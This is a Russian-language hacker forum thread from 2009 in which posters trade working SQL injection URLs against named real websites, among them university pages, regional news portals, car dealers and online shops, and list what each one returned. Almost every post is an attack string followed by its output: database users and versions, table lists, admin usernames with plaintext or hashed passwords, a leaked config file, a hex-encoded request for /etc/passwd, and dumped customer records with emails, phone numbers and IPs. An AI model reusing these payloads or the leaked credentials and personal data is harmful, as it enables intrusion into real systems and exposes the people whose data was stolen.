http://izhevsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=8
http://izhevsk.citysvyaz.ru/info.php
root@localhost
5.0.45-community-nt-log
http://izhevsk.citysvyaz.ru/in2.php
samara.citysvyaz.ru
http://samara.citysvyaz.ru/info.php
http://samara.citysvyaz.ru/news/?_Year=2009&_Month=2+union+select+1,2,user(),version(),5--&_Day=5
gorsvyaz@localhost
5.0.45-community-nt-log
omsk.citysvyaz.ru/
http://omsk.citysvyaz.ru/info.php
http://omsk.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=17
root@localhost
5.0.45-community-nt-log
nsk.citysvyaz.ru/
http://nsk.citysvyaz.ru/news/?_Year=2009&_Month=3+union+select+1,2,user(),version(),5--&_Day=11
nsk_citysvyaz@212.33.233.190
5.0.32-Debian_7etch8-log
tmn.citysvyaz.ru/
http://tmn.citysvyaz.ru/info.php
http://tmn.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=6
root@localhost
5.0.45-community-nt
chel.citysvyaz.ru/
http://chel.citysvyaz.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),version(),5--&_Day=5
root@localhost
5.1.19-beta-community-nt-debug
nch.citysvyaz.ru
http://nch.citysvyaz.ru/news/?_Year=2007&_Month=9+union+select+1,2,user(),version(),5--&_Day=26
root@localhost
5.0.45-community-nt
http://iskra.lysva.ru/news/?_Year=2009&_Month=4+union+select+1,2,user(),4,5,6,7%20--%20&_Day=11&PHPSESSID=e06ad578342540fd0f4e81c6d63caad3
beerhack
03.05.2009, 23:02
http://www.uark.edu/ua/wxl02/report.php?trm=-99999+union+select+version(),2,3,4,5,6,7,8--
Database Version: 5.0.75-log
--------------------------------------------------------------------
http://artdesign.calpoly.edu/alumni.php?year=-99999+union+select+1,2,3,4,5,6,7,8,9,concat_ws
(0x3a,user,password),11,12+from+mysql.user--
root:wusthof
--------------------------------------------------------------------
http://nkuconnections.nku.edu/detail.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN +('VwDictionary','dtproperties','sysconstraints',' syssegments','TblAbout','tblBuildingCodes','tblCat egory','TblCustom','TblCustomFields','tblEvents',' tbleventshack','tbleventshack2','TblLog','tblPartI ','tblPartII','tblPartIII','tblPartIV','tblPhotos' ,'tblSchedules','tblSecurity','vwevents','vwListEv ents'))
HAXTA4OK
03.05.2009, 23:41
халява ТВ (думаю поглумиться с update)
http://www.freetv.fr/tv.php?id=1+union+select+1,2,concat_ws(0x3a,ve rsion(),datab ase(),us er()),4,5,6,7,8,9,10,11,12--
5.0.68-log:freetvsql:freetvsql@10.0.65.48
PR: 2
..::TROYAN::..
03.05.2009, 23:59
еще пару шопов...
ec.kyict.com.tw
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
admin:hi7410
Таблицы:
http://ec.kyict.com.tw/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables/*
Кусок дампа таблицы с юзверями:
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('1', '1.tw@gmail.com', 'pansy_lai', 'e9f81a5f8c038fe7f5e579024e1ab60e', '', '', '2', '1908-01-01', '0.00', '0.00', '0', '0', '0', '1200871393', '0', '0000-00-00 00:00:00', '', '0', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('2', 'chiaho.tw@gmail.com', 'chiaho', '8ed35021606371c208f2d056c14e020e', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1146035280', '1200980182', '0000-00-00 00:00:00', '218.210.238.232', '3', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('3', '16888.tw@gmail.com', 'ritakao', '5724cf1a6a973cc01c7cc3890eb04dd5', '', '', '1', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1167017276', '1200965885', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('4', '2@yahoo.com.tw', 'shane', 'c7c5399b49dd043c96ed0c0258607e87', '', '', '1', '1989-05-07', '0.00', '0.00', '0', '0', '0', '1200995153', '1200966388', '0000-00-00 00:00:00', '218.210.238.232', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('5', 'suzy@kyict.com.tw', 'suzy', 'fe7cb68d197e9c938caa810d001b76f7', '', '', '2', '1983-05-05', '0.00', '0.00', '0', '0', '0', '1200996685', '1200968007', '0000-00-00 00:00:00', '60.249.120.190', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '1', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('6', 'kevin365007@gmail.com', 'kevin', 'dfdddbbe9c4aebc35385c67b1ed01a0f', '', '', '1', '1970-09-07', '0.00', '0.00', '2500', '2500', '1', '1152815400', '1201122884', '0000-00-00 00:00:00', '60.249.120.182', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('7', 'larrylin819@gmail.com', 'larrylin', 'b96ad5bb2173587d1c6b35ef4977b82e', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '2', '1201162547', '1201230188', '0000-00-00 00:00:00', '59.126.210.220', '2', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('8', 'swaya57@yahoo.com.tw', 'swaya57', '37ffbcbb89a0f03a3e0867341eee9b53', '', '', '0', '0000-00-00', '0.00', '0.00', '1', '1', '0', '1240790468', '1240790468', '0000-00-00 00:00:00', '163.24.24.117', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
АдминкЭ:
http://ec.kyict.com.tw/admin/index.php
Логин:admin
Пасс:hi7410
ОС: WINDOWS
PR:0
www.mjholly.com
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables/*
config.php
<?php
// database host
$db_host = "localhost:3306";
// database name
$db_name = "vhost15459-1";
// database username
$db_user = "vhost15459";
// database password
$db_pass = "phoebe";
// table prefix
$prefix = "ecs_";
$timezone = "Asia/Shanghai";
$cookie_path = "/";
$cookie_domain = "";
$admin_dir = "admin";
$session = "1440";
?>
Админ
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
mok579:a4836cd6d94d73eac97cdff2c47aab5f:jerry@mjho lly.com
Юзвери:
http://www.mjholly.com/ecshop/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c),8%20from%20ecs_user s/*
Кусок дампа из таблицы юзверей:
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('26', 's2224913@yahoo.com.tw', 's2224913', 'dc7f1d68d86fd5b29b97b342bd91a0ae', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1235846895', '1235846895', '0000-00-00 00:00:00', '58.114.130.16', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('27', 's726162001@yahoo.com.tw', 's726162001', 'cec6ddc2b766c26fd4a9bffd55f45dc7', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '0', '1237181260', '1237181260', '0000-00-00 00:00:00', '218.175.56.242', '1', '0', '0', '0', '0', '0', '', 'dodo.0708@hotmail.com', '', '', '', '0939356129', '0', '0.00');
INSERT INTO `ecs_users` ( `user_id`, `email`, `user_name`, `password`, `question`, `answer`, `sex`, `birthday`, `user_money`, `frozen_money`, `pay_points`, `rank_points`, `address_id`, `reg_time`, `last_login`, `last_time`, `last_ip`, `visit_count`, `user_rank`, `is_special`, `salt`, `parent_id`, `flag`, `alias`, `msn`, `qq`, `office_phone`, `home_phone`, `mobile_phone`, `is_validated`, `credit_line` ) VALUES ('28', 'beautiful8barbie@yahoo.com.tw', '蔡沛錞', 'c6158b366eb168d81117331a3c88ab8b', '', '', '0', '0000-00-00', '0.00', '0.00', '0', '0', '10', '1237581695', '1237581695', '0000-00-00 00:00:00', '114.32.139.143', '1', '0', '0', '0', '0', '0', '', '', '', '', '', '0987239628', '0', '0.00');
PR:2
ILYAtirtir
04.05.2009, 07:42
Armand Group
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,database(),user (),version()),4,5,6,7,8,9,10§ion=archive
u30316_cadillac:u30316@10.10.11.124:5.0.51-log
http://www.armand-chevrolet.ru/company/news/article/?id=19+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15§ion=new
u30316_chevrolet:u30316_chevrolet@10.10.11.124:5.0 .51-log
http://www.armand-hummer.ru/news/newsitem.php?id=16+and+1=2+union+select+1,2,concat _ws(0x3a,database(),user(),version()),4,5,6,7,8,9, 10§ion=new
u30316_hummer:u30316@10.10.11.124:5.0.51-log
http://www.armand-opel.ru/company/news/article/?id=15+union+select+1,2,concat_ws(0x3a,database(), user(),version()),4,5,6,7,8,9,10,11,12,13,14,15§ion=new
u30316_opel:u30316_opel@10.10.11.124:5.0.51-log
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,username,passwo rd,email),4,5,6,7,8,9,10+from+u30316.vb_user+limit +x,1
Mitridat:8fa28933e324369750ae85d026ba0b8c:galkin@a rmand.ru
FRM:d47748d5f5aa908c631dcecedfcef3af:frm@armand-group.ru
freemind:237d87b028023a3840331ae2cba2a7fb:freemind 01@gmail.com
Екатерина:820ef0cc6e148bbec7f9631338e84ee 4:e_kosatkina@armand-premium.ru
tabak72:96f74539d3b453aba888f1f01224509f:tabak72@m ail.ru
ulceple:9b0335d4d6ec5b8f046ebf34b128b022:svetlanal eopoldovna@gmail.com
http://www.armand-cadillac.ru/news/newsitem.php?id=-11+union+select+1,2,concat_ws(0x3a,hash,access),4, 5,6,7,8,9,10+from+u30316_cad_stat.cns_adminsession s
13ca4314d25cb955c1228a4393b77c54:admin
HAXTA4OK
04.05.2009, 10:46
http://www.otoplenie.eu/php/firm_profiles.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,data base(),user(),ver sion()),8,9,10,11,12,13,14,15,16,17,18,19,20,21--
otopleni_otoplenie:otopleni_otoplen@localhost:5.0. 67-community
------------------------------------------------------------------------
http://travelexpresbg.com/page.php?id=-1+union+select+1,concat_ws(0x3a,dat abase(),u ser(),versi on())--
travelex_te:travelex_te@localhost:5.0.67-community-log
BlackPanther
04.05.2009, 10:55
Продолжаем тему шоп-
http://www.vostart.com/web/eng/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*
[PR 4]
http://www.wedasoft.at/en/product.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,vers ion(),database(),user()))),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
4.1.15-Debian_0.dotdeb.4-log:wedasoft:wedas@localhost
[PR 3]
http://zonadostupa.ru/product.php?id=5814+union+select+concat_ws(0x3a,ve rsion(),database(),user())
4.1.22-log:wwwzonadostuparu:zonado02@fe30.hc.ru
HAXTA4OK
04.05.2009, 12:20
http://www.arcadi.fr/rendezvous/rv.php?id=-1'+union+select+1,2,concat_ws(0x3a,database(),use r(),versio n()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23/*
arcadi_web2:arcadi_web2@bizmachine8.co.fr.clara.ne t:5.0.33-log
PR: 6
Target: www.racingimages.cc
Evil link: http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,5,6,7/*
Database info:
user: racingimages@localhost
database: racingimages
version: 4.1.22-standard
Users (http://www.racingimages.cc/news.php?id=-119'+union+select+1,2,3,4,concat_ws(0x3a,login,pas sword),6,7+from+user/*)
vmt:$1$lNZVfFdL$10UMAm9L.FzCOax66mCJq/
lauri:$1$bNYsaYKl$BQPISnslvc2/5rC1G.XrO0
matti:$1$kMifYQzs$.JSbo5Wzyl2gfpJ79HF7J/
Админку не нашёл :(
..::TROYAN::..
04.05.2009, 13:04
Хип-Хоп портал
www.hiphopbase.ru
http://hiphopbase.ru/HipHopBase.php?site_page=111&id=-663+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6,7,8,9,10,11--
hiphopb4@localhost:4.1.22-log:hiphopb4_hhbasedb
PR:1
ТиЦ:10
HAXTA4OK
04.05.2009, 14:52
http://www.taxi-control.ru/index.php?id=-1+union+select+1,concat_ws(0x3a,database(),use r(),versio n()),3--
taxicontrol:taxicontrol@zvm4.host.ru:4.0.27-log
Skofield
04.05.2009, 15:18
http://www.sportstarmanagement.com PR 5
http://www.sportstarmanagement.com/News.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7/*
4.1.22-standard:sportsta_sportstardb:sportsta_sportst@loc alhost
mailbrush
04.05.2009, 15:39
http://www.lordsofmetal.nl/crew.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),dat abase(),version()),7,8,9,10,11,12,13,14,15,16,17,1 8,19mblofmetal_lom@localhost:mblofmetal_lom:5.0.51 a-community-log
http://www.bulfurniture.com/php/products.html?id=1
Blind
Юзер: bulfurniture@localhost
БД: bulfurniture
Версия: 4.0.24_Debian-10sarge3-log
Чтобы достать юзера, бд и версию, понадобилось 90 мб траффика.
_http://www.hunt-shop.ru/info.php?id=-24940+union+select+1,2,3,4,pass,6,7,8,9+from+admin--
{print in title}
4.0.27-log:hunt-shop@zvm13.host.ru:hunt-shop
Admin:password
_http://www.sport-timing.sk/shop/index.php?way=Tovar&goods_id=-470+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,version(),user(),database()),12,13,14,15,16--+
5.1.24-rc:sporttiming@localhost:sporttiming
_http://www.toddycafe.com/shop/product.php?productId=-67'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat _ws(0x3a,version(),user(),database()),14,15,16,17--+
5.0.37-community:toddycafe@localhost:toddycafe
_http://www.antiqueshop.ee/icons/aikon.php?id=-109+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database())--
5.0.67-log:virt1393usr@z136.zone.ee:virt1393
_http://www.santa.su/shop/?dir=1&pid=683'+union+select+concat_ws(0x3a,version(),use r(),database()),2,3,4,5--%20-
{print in source}
5.0.45:santa_su@localhost:db_santa_su
:(
ООО “РостИнвестЛизинг” — cовместно с Западно-Уральским банком Сбербанка РФ инвестирует свыше 200 предприятий.
http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
_SEREGA_
04.05.2009, 19:26
скуль: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--
версия: http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9--
5.0.27
таблицы выводятся limit'om:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables--
infa:
http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase()),6,7,8,9--
user() webtoad@localhost
database() jfdavis_webtoad
mailbrush
04.05.2009, 21:01
http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11
dma@constitution.design.ucla.edu:dma:5.0.45
ПС: Ачат теперь стал ин реинбов стайл?
Skofield
04.05.2009, 21:38
http://goglobal.fiu.edu
http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,19,11,12/*
4.1.14-nt:goglobal:goglobalUser@GOPANTHER.fiu.edu
_SEREGA_
04.05.2009, 21:45
скуль:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5--
версия:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5--
5.0.67
таблицы выводятся limit'om:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information _schema.tables--
infa:
http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database( )),4,5--
user() aroma15_aromasho@localhost
database() aroma15_aromaonline
mailbrush
04.05.2009, 21:51
Пензенский Региональный Центр Интернет Образования
тИЦ: 325
PR: 4
http://rcio.pnzgu.ru/grad.php?id=4801
Блинд, т.к. третяя ветка - юниона нету...
fio@localhost - User
fio - DB
3.23.58 - Version
_SEREGA_
04.05.2009, 22:13
скуль:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7, 8--
версия:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3, 4,5,6,7,8--
5.0.24
список таблиц:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3 ,4,5,6,7,8+from+information_schema.tables--
видим таблицу login
список столбцов:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name, 3,4,5,6,7,8+from+information_schema.columns--
видим стобцы: user и pass
выводим инфу:
user:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6 ,7,8+from+login--
pass:
http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6 ,7,8+from+login--
infa:
user: exhibit001
pass: ireland2
админку не нашёл =((((((((
Skofield
04.05.2009, 22:20
http://www.vdostudio.com
http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.22
database() - vdostudio
-m0rgan-
04.05.2009, 22:21
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5--
юзер/бд/версия:
wonderwork_db1@192.168.0.56 : wonderwork_db1 : 5.0.51a-24-log
Админ:
http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id ,username,password),3,4,5+from+admin--
ид/логин/пасс:
1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a
AkyHa_MaTaTa
04.05.2009, 22:30
nfca.org(with file_priv) pr - 6:
http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user( ),version(),database()),LOAD_FILE(0x2f6574632f7061 73737764),8--+
dbclient@69.94.233.43:4.0.24-log:ism_data_nfca
-m0rgan-
04.05.2009, 23:10
http://www.autokom.cz/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58, 32),user(),database(),version()),6--
юзер/бд/версия:
www_autokom_cz@localhost : www_autokom_cz : 5.0.45
mailbrush
04.05.2009, 23:57
http://www.black-time.net/usr.php?act=com&id_obj=-1+union+select+1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3 a,user(),database(),version()))),8,9,10,11,12,13,1 4black-time@ipx10233.ipxserver.de:black-time:4.1.8-standard
Skofield
05.05.2009, 02:08
http://www.ftlauderdalenews.net (PR3)
http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7,8+from+users/*
4.1.20-max-log:Promena_news:Promena_pubuser@76.162.254.225
http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,pa ssword,name),5,6,7,8+from+users/*
name : Ray Brasted
password : 1x2y3z
-m0rgan-
05.05.2009, 08:23
http://www.cfs-nl.ca/media-read.php?id=-1+union+all+select+0,1,2,3,4,5,CONCAT_WS(CHAR(32,5 8,32),user(),database(),version()),7,8,9,10,11,12--
user/db/version:
cfsnl_admin@localhost : cfsnl_admin_old : 5.0.45-log
cialis-cialis.com
http://www.cialis-cialis.com/art.php?id=-29%20union%20select%201,2,unhex(hex(concat_ws(0x3a ,version(),user(),database()))),4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9
4.1.10-standard:poppen_shop3@localhost:poppen_shop3
В австрийском гугле стоит по хорошим запросам =)
____________________________________________
http://www.talkeetnachamber.org PR4
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9,0,1
5.0.51a-log:talkeetn_db01:talkeetn_db01@boscgi1001.eigbox. net
Существует интересная табличка с данными для подключения к БД
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,group_concat(column_na me),5,6,7,8,9,0,1%20from%20information_schema.colu mns%20where%20table_name=0x7068704d795365617263685 f73657474696e6773
Действуем =)
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a3a3a,DBN ame,DBUser,DBPassword,DBHost),5,6,7,8,9,0,1%20from %20phpMySearch_settings
DBName,DBUser,DBPassword,DBHost
talkeetn_db01:::talkeetn_db01:::freckles:::localho st
[PR 4]
http://www.golf-in-japan.com/prefcourses/data.php?ID=-178+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29--
4.0.27-log:golfinja:golfinja@mynah3.web.gol.com
[PR 0]
http://www.okna-astem.ru/data.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20--
5.0.51a-community:db_oknaastem1:oknaastem1@localhost
HAXTA4OK
05.05.2009, 13:11
http://www.cash.ge/doors.php?id=1'+union+select+1,2,concat_ws(0x3a,ve rsion(),da tabase(),u ser()),4/*&lang=eng
4.1.22-standard:cashge_aks:cashge_aks@localhost
------------------------------------------------------------------------
Грузинский сайт про что то там
http://www.muskie.ge/acus.php?lan_id=1&id=-1+union+select+1,2,concat_ws(0x3a,ver sion(),databa se(),user()),4,5--
4.0.27:muskie_ge:muskie_ge@localhost
PR: 2
------------------------------------------------------------------------
http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,version(),data base(),us er()),3,4,5--
4.1.7-max-log:mitex:mitex@localhost
mailbrush
05.05.2009, 15:21
http://acthra.anu.edu.au/cases/case.php?id=86
Blind - union почему-то не пашет.
V: 5.0.45-log
U: anu_human_rights@doiweb1.-css.anu.edu.eu
DB: regent_acthra
-m0rgan-
05.05.2009, 15:21
http://www.tosport.ru/detail_1247'.html
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/**/from/**/information_schema.tables--
C неё берём таблицу cizar_admin
смотрим её содержимое:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where/**/table_name=0x63697a61725f61646d696e--
id,access,login,password,name,position,address,pho ne,email,description,pactive,menu_access
Дальше либо я туплю, либо...кароче вывод не получается :(
Данные бд:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20--
HAXTA4OK
05.05.2009, 15:22
Опять грузия
http://www.webmix.ge/g_viewweb.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,concat_ws(0x3a,version(),datab ase(),us er()),40--
5.0.75-community-log:webmixin_portfolio:webmixin_portfol@localhost
ТИЦ: 20
PR: 5
mailbrush
05.05.2009, 16:00
http://www.cir.org.br/noticias.php?id=592+union+select+1,2,3,4,5,6,7,con cat_ws(0x3a,user(),database(),version()),9,10,11,1 2,13,14,15,16,17,18,19,20,21,22cir_admin@localhost :cir_db:4.1.20
-m0rgan-
05.05.2009, 16:08
http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),17--+
db info:
db14709@64.13.192.31 : db14709_fvh_stage : 4.1.25-Debian_mt1
..::TROYAN::..
05.05.2009, 16:49
www.rnb-music.ru
COncat'oM неполучается выводить
http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--
user():altero_rnb@localhost
http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--
version():5.0.22
http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--
database():altero_rnb
Таблицы:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+infor mation_schema.tables--
» afisha (262)
» articles (76)
» artist (44)
» ban_ip (190)
» ban_name (186)
» banners (23)
» billboard (296)
» bios (19)
» booking (6)
» catalog (3)
» celebs_comments (10331)
» chart (12521)
» chart_name (3)
» chart_type (5)
» charts (24)
» city (13)
» clubs (52)
» comments (40953)
» contest (2)
» dance (8)
» demos (19)
» demos2 (3)
» dj (23)
» dj_comments (301)
» djmail (337)
» feedback (904)
» links (823)
» lyrics (8173)
» mixes (56)
» myalbums (8)
» myphotos (1059)
» myphotos_comments (3287)
» myphotos_stats (190415)
» myphotos_text (969)
» newphotos (3538)
» news (609)
» photo_comments (19213)
» photos (122)
» q_a (25)
» releases (439)
» reviews (32)
